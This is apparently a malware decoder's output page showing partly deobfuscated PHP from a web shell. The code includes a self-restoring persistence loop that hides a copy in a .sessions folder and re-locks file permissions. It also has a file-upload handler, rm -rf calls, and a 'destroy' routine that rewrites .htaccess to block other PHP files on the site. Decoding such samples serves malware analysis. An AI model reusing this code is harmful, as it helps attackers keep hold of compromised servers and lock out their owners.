Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


if (isset($_GET["lockshell"])) {
    $utqmnnk = "curFile";
    $jknnjceqxq = "TmpNames";
    ${"GLOBALS"}["qmlakymll"] = "TmpNames";
    $isohmvpx = "curFile";
    $zvtyjjr = "hndlers";
    ${"GLOBALS"}["ytpsdrzovm"] = "TmpNames";
    $dbpnkmsfi = "fungsi";
    $bdoupnyyd = "TmpNames";
    ${"GLOBALS"}["utpijttxc"] = "curFile";
    ${"GLOBALS"}["pkbruqy"] = "TmpNames";
    ${"GLOBALS"}["jmvkaguf"] = "fungsi";
    ${"GLOBALS"}["xhlfiasj"] = "fungsi";
    $ynojlolnjc = "curFile";
    ${${"GLOBALS"}["vfuhqrqrce"]} = trim(basename($_SERVER["SCRIPT_FILENAME"]));
    ${${"GLOBALS"}["nfodbdej"]} = ${${"GLOBALS"}["snxjpduol"]}[31]();
    if (file_exists(${${"GLOBALS"}["pkbruqy"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${$utqmnnk}) . "-handler")) && file_exists(${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["xhlfiasj"]}[0]() . remove_dot(${$ynojlolnjc}) . "-text"))) {
        ${"GLOBALS"}["bmvgwnxbcio"] = "curFile";
        ${"GLOBALS"}["cmtlkbi"] = "curFile";
        ${"GLOBALS"}["awjjksll"] = "TmpNames";
        $btcufyjqga = "fungsi";
        cmd("rm -rf " . ${${"GLOBALS"}["awjjksll"]} . "/.sessions/." . base64_encode(${$btcufyjqga}[0]() . remove_dot(${${"GLOBALS"}["bmvgwnxbcio"]}) . "-text"));
        cmd("rm -rf " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["cmtlkbi"]}) . "-handler"));
    }
    $enznadbms = "curFile";
    ${"GLOBALS"}["adfvwfpqx"] = "handler";
    $jadnlsj = "curFile";
    mkdir(${${"GLOBALS"}["qmlakymll"]} . "/.sessions");
    cmd("cp $curFile " . ${$jknnjceqxq} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vfuhqrqrce"]}) . "-text"));
    $ehhejlebpl = "fungsi";
    chmod(${${"GLOBALS"}["vfuhqrqrce"]}, 0555);
    $lkbiqkuwg = "fungsi";
    ${${"GLOBALS"}["adfvwfpqx"]} = "\n\n@ini_set("max_execution_time\", 0);\nwhile (True){\n    if (!file_exists("" . __DIR__ . "\")){\n        mkdir("" . __DIR__ . "\");\n    }\n    if (!file_exists(\"" . ${$lkbiqkuwg}[0]() . "/" . ${${"GLOBALS"}["vfuhqrqrce"]} . "")){\n        \$text = base64_encode(file_get_contents(\"" . ${${"GLOBALS"}["ytpsdrzovm"]} . "/.sessions/." . base64_encode(${$ehhejlebpl}[0]() . remove_dot(${$jadnlsj}) . "-text") . ""));\n        file_put_contents(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["vfuhqrqrce"]} . "", base64_decode(\$text));\n    }\n    if (gecko_perm(\"" . ${$dbpnkmsfi}[0]() . "/" . ${$enznadbms} . "\") != 0444){\n        chmod(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${$isohmvpx} . "", 0444);\n    }\n}\n\nfunction gecko_perm(\$flename){\n    return substr(sprintf("%o\", fileperms(\$flename)), -4);\n}\n";
    $nbxxth = "hndlers";
    ${$zvtyjjr} = ${${"GLOBALS"}["jmvkaguf"]}[28](${$bdoupnyyd} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["utpijttxc"]}) . "-handler") . "", ${${"GLOBALS"}["vogxys"]});
    if (${$nbxxth}) {
        ${"GLOBALS"}["crgdxzpu"] = "fungsi";
        cmd("php " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["crgdxzpu"]}[0]() . remove_dot(${${"GLOBALS"}["vfuhqrqrce"]}) . "-handler") . " > /dev/null 2>/dev/null &");
    } else {
        failed();
    }
}
if (isset($_POST["gecko-up-submit"])) {
    $ovodrch = "fungsi";
    ${"GLOBALS"}["dblstedt"] = "tmpName";
    ${"GLOBALS"}["ykovngbq"] = "tmpName";
    ${${"GLOBALS"}["tskfcwedkdet"]} = $_FILES["gecko-upload"]["name"];
    ${${"GLOBALS"}["ykovngbq"]} = $_FILES["gecko-upload"]["tmp_name"];
    if (${$ovodrch}[29](${${"GLOBALS"}["dblstedt"]}, ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["tskfcwedkdet"]})) {
        success();
    } else {
        failed();
    }
}
if ($_GET["logout"] == True) {
    session_destroy();
    session_unset();
    success();
}
if (isset($_GET["destroy"])) {
    $xuucfxmk = "DOC_ROOT";
    ${$xuucfxmk} = $_SERVER["DOCUMENT_ROOT"];
    $sscohen = "CurrentFile";
    ${$sscohen} = trim(basename($_SERVER["SCRIPT_FILENAME"]));
    if (${${"GLOBALS"}["snxjpduol"]}[4](${${"GLOBALS"}["wiyrtp"]})) {
        ${"GLOBALS"}["wfwlsa"] = "DOC_ROOT";
        ${"GLOBALS"}["gxytrvgtc"] = "htaccess";
        ${${"GLOBALS"}["yyxroabywchy"]} = "\n<FilesMatch "\.(php|ph*|Ph*|PH*|pH*)\$">\n    Deny from all\n</FilesMatch>\n<FilesMatch \"^(" . ${${"GLOBALS"}["xpixzuvernku"]} . "|index.php|wp-config.php|wp-includes.php)\$">\n    Allow from all\n</FilesMatch>\n<FilesMatch \"\\.(jpg|png|gif|pdf|jpeg)\$\">\n    Allow from all\n</FilesMatch>";
        ${"GLOBALS"}["xbvdxflvcc"] = "put_htt";
        ${"GLOBALS"}["mgsqrjmx"] = "fungsi";
        $umjimuogf = "put_htt";
        ${${"GLOBALS"}["xbvdxflvcc"]} = ${${"GLOBALS"}["mgsqrjmx"]}[28](${${"GLOBALS"}["wfwlsa"]} . "/.htaccess", ${${"GLOBALS"}["gxytrvgtc"]});
        if (${$umjimuogf}) {
            success();
        } else {
            failed();
        }
    } else {
        failed();
    }
}


© 2023 Quttera Ltd. All rights reserved.